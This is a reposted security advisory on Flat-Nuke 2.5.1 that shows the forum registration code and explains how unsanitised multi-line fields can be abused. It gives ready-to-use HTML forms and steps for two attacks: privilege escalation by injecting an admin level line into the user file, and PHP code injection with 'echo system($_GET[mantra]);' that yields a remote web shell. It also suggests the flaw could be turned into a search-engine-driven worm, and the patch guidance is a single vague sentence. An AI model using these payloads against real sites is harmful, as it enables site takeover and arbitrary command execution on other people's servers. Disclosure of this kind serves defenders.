信息来源:
www.securityfocus.com
*************************************************************
* CODEBUG Labs
* Advisory #6
* Title: Multiple Vulnerabilities in Flat-nuke
* Author: Pierquinto 'Mantra' Manco
* English Version: David 'hanska' Paleino
* Product: Flat-Nuke 2.5.1
* Type: Multiple Vulnerabilities
* Web:
http://www.codebug.org
*
**************************************************************
-) Software Page (
www.flatnuke.org)
"FlatNuke is a CMS (Content Management System) which doesn't use any DBMS, in favour
of text files only (from this fact comes its name). The last stable version of
FlatNuke is 2.5.1."
-) The vulnerable function
The vulnerability stays in the index.php file in flatnuke's forum/ directory, which
is located in the scripts' main directory:
<?
if(!file_exists("users/$nome.php")) {
if(($nome == "") || ($regpass == "") || (stristr($nome, "")) || (strlen($nome) >
13) || (stristr($nome,"\"")) || (stristr($nome, "\\")) || ($regpass != $reregpass)){
print _FERRCAMPO . "<br><a href=\"javascript:history.back()\"><<" . _INDIETRO
. "</a>";
}
else {
$nome = str_replace("<", "", $nome);
$nome = str_replace(">", "", $nome);
$nome = stripslashes($nome);
$regpass = str_replace("<", "", $regpass);
$regpass = str_replace(">", "", $regpass);
$anag = str_replace(">", "", $anag);
$anag = str_replace("<", "", $anag);
$anag = stripslashes($anag);
$email = str_replace("<", "", $email);
$email = str_replace(">", "", $email);
$email = stripslashes($email);
$homep = str_replace("<", "", $homep);
$homep = str_replace(">", "", $homep);
$homep = stripslashes($homep);
$prof = str_replace("<", "", $prof);
$prof = str_replace(">", "", $prof);
$prof = stripslashes($prof);
$prov = str_replace("<", "", $prov);
$prov = str_replace(">", "", $prov);
$prov = stripslashes($prov);
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
if ($ava == "")
$ava="blank.png";
if ($url_avatar != "") {
$ava = $url_avatar;
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
}
else {
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
$ava = "images/" . $ava;
}
$firma = str_replace("<", "", $firma);
$firma = str_replace(">", "", $firma);
$firma = stripslashes($firma);
# Stores the password in a MD5 hash.
$regpass = md5($regpass);
$firma = str_replace("\n", "<br>", $firma);
$fp = fopen("users/$nome.php", "w");
// these fwrite() don't need any concurrent
// access check since the user can only access
// his own file
fwrite($fp, "<?\n");
fwrite($fp, "#$regpass\n");
fwrite($fp, "#$anag\n");
fwrite($fp, "#$email\n");
fwrite($fp, "#$homep\n");
fwrite($fp, "#$prof\n");
fwrite($fp, "#$prov\n");
fwrite($fp, "#$ava\n");
fwrite($fp, "#$firma\n");
fwrite($fp, "#$level\n");
fwrite($fp, "?>\n");
fclose($fp);
...
?>
- - ) Remote Privilege Escalation
Make a HTML page with the following code:
<form action="
http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://"><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature: <textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Once you open the HTML page in ANY web browser, you need to fill in every field but
the one called url_avatar, which we will use to register ourselves as administrators.
In the "url_avatar" field, press Enter at least twice, then write #10, this way we
will make directives registering us as administrators precede that ones which would
register us as normal users.
All this is possible because the script, in the registration function, does not check
the values contained in the text fields that we have opportunely changed into
textarea fields.
- - ) PHP Code Injection
This bug came into evidence while I was writing about the Remote Privilege Escalation:
<form action="
http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://"><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature:
<textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Let's open again our HTML page from a browser and just fill in the fields like we
did for the Remote Privilege Escalation bug. We will now use our "url_avatar" textarea
to inject malicious code.
At this point, press Enter at least once and put out malicious PHP code, for example:
echo system($_GET[mantra]);
This command, for example, will give us a shell accessible from:
http://www.sitewithflatnuke.org/ ... =command_to_execute
- ) Patch
To correct these vulnerabilities some further parameters-checking should be implemented,
and the users registration and mantainance system should be restructured.
-) Notes
Through the use of Google or any other kind of search engine it is possible to create
a worm, like Santy for phpBB, and spread it over each system running FlatNuke,
with a high probability of causing damages.
*****************************************************************
http://www.codebug.org
*****************************************************************
